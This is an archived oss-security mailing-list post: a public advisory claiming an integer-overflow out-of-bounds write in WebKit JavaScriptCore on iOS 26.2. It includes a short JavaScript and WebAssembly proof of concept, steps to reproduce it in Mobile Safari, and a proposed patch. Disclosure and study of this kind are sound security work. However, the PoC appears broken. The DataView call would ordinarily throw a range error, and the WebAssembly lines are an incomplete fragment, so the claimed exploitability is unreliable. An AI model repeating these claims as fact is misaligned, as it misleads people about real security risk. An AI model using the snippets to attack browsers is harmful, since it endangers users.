Products Openwall GNU/*/Linux   server OS Linux Kernel Runtime Guard John the Ripper   password cracker Free & Open Source for any platform in the cloud Pro for Linux Pro for macOS Wordlists   for password cracking passwdqc   policy enforcement Free & Open Source for Unix Pro for Windows (Active Directory) yescrypt   KDF & password hashing yespower   Proof-of-Work (PoW) crypt_blowfish   password hashing phpass   ditto in PHP tcb   better password shadowing Pluggable Authentication Modules scanlogd   port scan detector popa3d   tiny POP3 daemon blists   web interface to mailing lists msulogin   single user mode login php_mt_seed   mt_rand() cracker Services Publications Articles Presentations Resources Mailing lists Community wiki Source code repositories (GitHub) File archive & mirrors How to verify digital signatures OVE IDs What's new

Message-ID: <jq8xQxO7VyzQbtSsLz_p4DUzIOsf476KniI3gerokeyM90-zpczEWoWDiBQH0AYnpCr51vbCQX9qyBPuOqr20UplDsFlLbBRU0h2_swCBk4=@proton.me>
Date: Fri, 26 Dec 2025 21:57:26 +0000
From: Joseph Goydish II <newt0ns_law@...ton.me>
To: "oss-security@...ts.openwall.com" <oss-security@...ts.openwall.com>
Cc: Apple Product Security <product-security@...le.com>
Subject: [Advisory] WebKit/iOS 26.2: Gigacage Boundary Violation via Logic Flaw enabling OOB Access

[CVE Pending] WebKit JSC Integer Overflow – OOB Write via Gigacage (iOS 26.2)
--------------------------------------------------------------------Full advisory, PoC, and logs:
[https://github.com/JGoyd/0day-GigaCage-Webkit]
--------------------------------------------------------------------
1. Executive Summary

A critical vulnerability exists in the WebKit JavaScriptCore (JSC)
engine. Integer overflow in memory offset calculations for
ArrayBuffer, TypedArray, and WebAssembly enables out-of-bounds
(OOB) memory access. Gigacage currently mitigates this via process
termination, but the underlying logic flaw could be used for remote
code execution if combined with a mitigation bypass.

--------------------------------------------------------------------
2. Environment Details

OS: iOS 26.2 (Build 23C55)
WebKit: 8623.1.14.10.9
Crash: EXC_GUARD (Namespace 31: Gigacage Primitive Partition)
Offset: 0xADD7476C
Device: iPhone 15,3 (iPhone 14 Pro Max)
UUID: af25fa78-ae3e-3bf4-b320-4404d3a36a77

--------------------------------------------------------------------
3. Technical Analysis (CWE-190)

Vulnerability occurs during offset calculation for TypedArray and
DataView. If 'index * elementSize' wraps at the 32-bit boundary, the
overflowed value can pass initial bounds checks. When added to the
Gigacage base pointer, this can exceed the 16GB boundary, triggering
a guard violation.

The flaw is also reachable via the WebAssembly JIT, which may elide
bounds checks; wraparound in 32-bit arithmetic permits unsanitized
JITed memory access.

--------------------------------------------------------------------
4. Proof of Concept (PoC)

JavaScript (DataView vector):

const buffer = new ArrayBuffer(1024);
const view = new DataView(buffer);
// 0xFFFFFFFE + 4 wraps at 32-bits
view.setUint32(0xFFFFFFFE, 0x41414141);

WebAssembly (JIT vector):

;; (i32.add (i32.const 0xFFFFFFFF) (i32.const 0x5)) wraps to 0x4
(i32.load offset=0)

Reproduction Steps:

1. Host PoC HTML on HTTPS server.
2. Access with Mobile Safari on iOS 26.2.
3. Observe termination of WebContent process.
4. Confirm offset 0xADD7476C in crash log.

--------------------------------------------------------------------
5. Remediation

Implement checked arithmetic in the following components:

- Source/JavaScriptCore/runtime/JSArrayBufferView.cpp
- Source/JavaScriptCore/runtime/JSDataView.cpp

Proposed fix:

size_t byteOffset;
if (__builtin_mul_overflow(static_cast<size_t>(index),
m_elementSize, &byteOffset)) {
return throwOverflowError();
}

--------------------------------------------------------------------
6. Supporting Evidence

Consistent crash offset and namespace 31 violation found in:

ExcUserFault_MobileSafari-2025-12-25-131432.ips
ExcUserFault_SafariViewService-2025-12-25-062945.ips

--------------------------------------------------------------------
7. Disclosure

Apple Security is being notified at the same time as this public
mailing list post, as they are CC'd on this email. This is not a
coordinated disclosure; notification to Apple and the broadercommunity is occurring simultaneously.
--------------------------------------------------------------------
8. Legal Disclaimer

Provided for authorized security research only.
Unauthorized use is prohibited and may be unlawful.

--------------------------------------------------------------------

Thank you,
Joseph Goydish II

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.